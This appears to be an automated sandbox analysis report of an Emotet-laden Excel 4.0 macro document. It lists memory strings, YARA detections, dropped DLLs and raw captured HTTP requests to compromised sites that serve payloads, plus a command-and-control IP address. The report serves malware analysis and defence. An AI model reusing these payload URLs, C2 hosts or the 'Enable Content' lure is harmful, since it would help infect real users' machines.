                      Source: regsvr32.exe, 00000004.00000002.1246730397.0000000002F52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1246678679.0000000003144000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1246678531.0000000002F70000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1246628773.0000000003206000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                      Source: regsvr32.exe, 00000004.00000002.1246730397.0000000002F52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1246678679.0000000003144000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1246678531.0000000002F70000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1246628773.0000000003206000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                      Source: regsvr32.exe, 00000004.00000002.1246730397.0000000002F52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1246678679.0000000003144000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1246678531.0000000002F70000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1246628773.0000000003206000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                      Source: regsvr32.exe, 00000004.00000002.1246730397.0000000002F52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1246678679.0000000003144000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1246678531.0000000002F70000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1246628773.0000000003206000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                      Source: regsvr32.exe, 00000004.00000002.1246730397.0000000002F52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1246678679.0000000003144000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1246678531.0000000002F70000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1246628773.0000000003206000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: regsvr32.exe, 00000004.00000002.1246730397.0000000002F52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1246678679.0000000003144000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1246678531.0000000002F70000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1246628773.0000000003206000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                      Source: regsvr32.exe, 00000004.00000002.1246730397.0000000002F52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1246678679.0000000003144000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1246678531.0000000002F70000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1246628773.0000000003206000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                      Source: regsvr32.exe, 00000004.00000002.1246179187.0000000000229000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.997469315.0000000000229000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1246320185.000000000045D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1246211025.00000000002E7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1246131715.0000000000156000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: 77EC63BDA74BD0D0E0426DC8F80085060.4.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: regsvr32.exe, 00000004.00000002.1246179187.0000000000229000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.997469315.0000000000229000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme
                      Source: regsvr32.exe, 00000006.00000002.1246320185.000000000045D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme%w
                      Source: regsvr32.exe, 00000008.00000002.1246211025.00000000002E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme19
                      Source: regsvr32.exe, 0000000A.00000002.1246083298.000000000012A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabmem
                      Source: regsvr32.exe, 00000004.00000002.1246730397.0000000002F52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1246678679.0000000003144000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1246678531.0000000002F70000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1246628773.0000000003206000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: regsvr32.exe, 00000004.00000002.1246730397.0000000002F52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1246678679.0000000003144000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1246678531.0000000002F70000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1246628773.0000000003206000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                      Source: regsvr32.exe, 00000004.00000002.1246730397.0000000002F52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1246678679.0000000003144000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1246678531.0000000002F70000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1246628773.0000000003206000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                      Source: regsvr32.exe, 00000004.00000002.1246730397.0000000002F52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1246678679.0000000003144000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1246678531.0000000002F70000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1246628773.0000000003206000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                      Source: regsvr32.exe, 00000004.00000002.1246730397.0000000002F52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1246678679.0000000003144000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1246678531.0000000002F70000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1246628773.0000000003206000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                      Source: regsvr32.exe, 00000004.00000002.1246730397.0000000002F52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1246678679.0000000003144000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1246678531.0000000002F70000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1246628773.0000000003206000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                      Source: regsvr32.exe, 00000004.00000002.1246730397.0000000002F52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1246678679.0000000003144000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1246678531.0000000002F70000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1246628773.0000000003206000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                      Source: regsvr32.exe, 00000004.00000002.1246730397.0000000002F52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1246678679.0000000003144000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1246678531.0000000002F70000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1246628773.0000000003206000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                      Source: regsvr32.exe, 00000004.00000002.1246730397.0000000002F52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1246678679.0000000003144000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1246678531.0000000002F70000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1246628773.0000000003206000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                      Source: regsvr32.exe, 00000004.00000003.997505228.0000000000245000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1246216241.0000000000245000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1246320185.000000000045D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://165.22.73.229/
                      Source: regsvr32.exe, 00000008.00000002.1246211025.00000000002E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://165.22.73.229/d
                      Source: regsvr32.exe, 00000004.00000003.997505228.0000000000245000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1246216241.0000000000245000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1246320185.000000000045D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1246211025.00000000002E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://165.22.73.229/p
                      Source: regsvr32.exe, 0000000A.00000002.1246083298.000000000012A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://165.22.73.229/q
                      Source: regsvr32.exe, 0000000A.00000002.1246083298.000000000012A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://165.22.73.229/y
                      Source: regsvr32.exe, 00000004.00000003.997505228.0000000000245000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1246216241.0000000000245000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1246320185.000000000045D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1246211025.00000000002E7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1246083298.000000000012A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://165.22.73.229:8080/
                      Source: regsvr32.exe, 0000000A.00000002.1246083298.000000000012A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://165.22.73.229:8080/Q
                      Source: regsvr32.exe, 00000008.00000002.1246211025.00000000002E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://165.22.73.229:8080/h
                      Source: regsvr32.exe, 00000004.00000003.997505228.0000000000245000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1246216241.0000000000245000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://165.22.73.229:8080/x
                      Source: regsvr32.exe, 00000004.00000002.1246730397.0000000002F52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1246678679.0000000003144000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1246678531.0000000002F70000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1246628773.0000000003206000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\LeBuXD3cUkeiPrfy[1].dllJump to behavior
                      Source: unknownDNS traffic detected: queries for: newkano.com
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180017C8C InternetReadFile,4_2_0000000180017C8C
                      Source: global trafficHTTP traffic detected: GET /wp-admin/66rIsrVwoPKUsjcAs/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: newkano.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /assets/OPVeVSpO/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: myphamcuatui.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /inc/Wcm82enrs8/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ocalogullari.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /old_source/9boJQZpTSdQE/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sieuthiphutungxenang.comConnection: Keep-Alive
                      Source: unknownHTTPS traffic detected: 103.45.230.202:443 -> 192.168.2.22:49173 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 103.1.238.211:443 -> 192.168.2.22:49175 version: TLS 1.2
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_1001963C GetParent,ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,3_2_1001963C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_1002DD04 GetKeyState,GetKeyState,GetKeyState,GetParent,GetParent,SendMessageW,ScreenToClient,GetCursorPos,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetWindowPos,SendMessageW,SendMessageW,GetParent,3_2_1002DD04
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_10011FC8 GetKeyState,GetKeyState,GetKeyState,SendMessageW,3_2_10011FC8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_1001963C GetParent,ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,4_2_1001963C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_1002DD04 GetKeyState,GetKeyState,GetKeyState,GetParent,GetParent,SendMessageW,ScreenToClient,GetCursorPos,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetWindowPos,SendMessageW,SendMessageW,GetParent,4_2_1002DD04
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_10011FC8 GetKeyState,GetKeyState,GetKeyState,SendMessageW,4_2_10011FC8

                      E-Banking Fraud

                      barindex
                      Yara detected Emotet
                      Source: Yara matchFile source: 6.2.regsvr32.exe.140000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.140000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.regsvr32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.regsvr32.exe.3c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.140000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.regsvr32.exe.3c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.regsvr32.exe.2c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.regsvr32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.regsvr32.exe.170000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.regsvr32.exe.170000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.regsvr32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.regsvr32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.regsvr32.exe.2c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.regsvr32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.regsvr32.exe.1d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.140000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.1245962917.00000000001C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1247080526.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.948473026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.947931348.00000000001C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1246205608.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1247188737.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.970233214.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1247115640.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.958523916.0000000000170000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.968294741.00000000001D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1245946731.0000000000140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1247066276.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.959190688.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1246240752.00000000002C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.941525793.0000000000140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

                      System Summary

                      barindex
                      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
                      Source: Screenshot number: 4Screenshot OCR: Enable Content 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
                      Found malicious Excel 4.0 Macro
                      Source: allegati_23052022.xlsMacro extractor: Sheet: PKEKPPGEKKPGE contains: URLDownloadToFileA
                      Source: allegati_23052022.xlsMacro extractor: Sheet: PKEKPPGEKKPGE contains: URLDownloadToFileA
                      Office process drops PE file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\cusoa1.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\QqHRFPCw2sMluT[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\cusoa3.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\cusoa4.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4bP[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\LeBuXD3cUkeiPrfy[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\cusoa2.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\nB5U[1].dllJump to dropped file
                      Found Excel 4.0 Macro with suspicious formulas
                      Source: allegati_23052022.xlsInitial sample: EXEC
                      Source: allegati_23052022.xlsInitial sample: EXEC
                      Source: allegati_23052022.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                      Source: C:\Users\user\Desktop\allegati_23052022.xls, type: DROPPEDMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\system32\TURzt\Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_100430403_2_10043040
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_100170643_2_10017064
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_1003C0903_2_1003C090
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_1002A0B03_2_1002A0B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_1000D0EC3_2_1000D0EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_100111A43_2_100111A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_100452A03_2_100452A0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_100492B03_2_100492B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_100143A43_2_100143A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_100464703_2_10046470
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_100344A83_2_100344A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_1003E4F03_2_1003E4F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_100255203_2_10025520
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_100455E03_2_100455E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_1000D5F83_2_1000D5F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_1001C60C3_2_1001C60C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_100526903_2_10052690
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_1004A7003_2_1004A700
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_1002073C3_2_1002073C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_1001B7983_2_1001B798
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_1004B7E03_2_1004B7E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_100518503_2_10051850
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_1004F8A03_2_1004F8A0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_100349543_2_10034954
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_100489703_2_10048970
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_100449903_2_10044990
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_100529B03_2_100529B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_10017A8C3_2_10017A8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_10048AF03_2_10048AF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_10036B503_2_10036B50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_1004EBF03_2_1004EBF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_1004AC803_2_1004AC80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_1002DD043_2_1002DD04
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_1003BD803_2_1003BD80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_1001ADF83_2_1001ADF8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_10044E003_2_10044E00
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_10050E303_2_10050E30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_1001BEC83_2_1001BEC8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_1002CF303_2_1002CF30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_10050F803_2_10050F80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_1002BF8C3_2_1002BF8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_10045FC03_2_10045FC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_10032FF83_2_10032FF8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_001300003_2_00130000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002C2C83_2_000000018002C2C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800013783_2_0000000180001378
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800264103_2_0000000180026410
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180025C303_2_0000000180025C30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180001D583_2_0000000180001D58
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180011E5C3_2_0000000180011E5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002C6C83_2_000000018002C6C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180026F143_2_0000000180026F14
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180018FE83_2_0000000180018FE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800247FC3_2_00000001800247FC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001100C3_2_000000018001100C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001303C3_2_000000018001303C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002A8403_2_000000018002A840
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800038403_2_0000000180003840
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000F0483_2_000000018000F048
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800100503_2_0000000180010050
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800030503_2_0000000180003050
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000C85C3_2_000000018000C85C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001586C3_2_000000018001586C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000406C3_2_000000018000406C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000E06C3_2_000000018000E06C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800160883_2_0000000180016088
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800028883_2_0000000180002888
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002D0983_2_000000018002D098
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800180D43_2_00000001800180D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800010E83_2_00000001800010E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000E8F03_2_000000018000E8F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002A0F83_2_000000018002A0F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800199003_2_0000000180019900
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800119043_2_0000000180011904
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001F9083_2_000000018001F908
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002490C3_2_000000018002490C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001890C3_2_000000018001890C
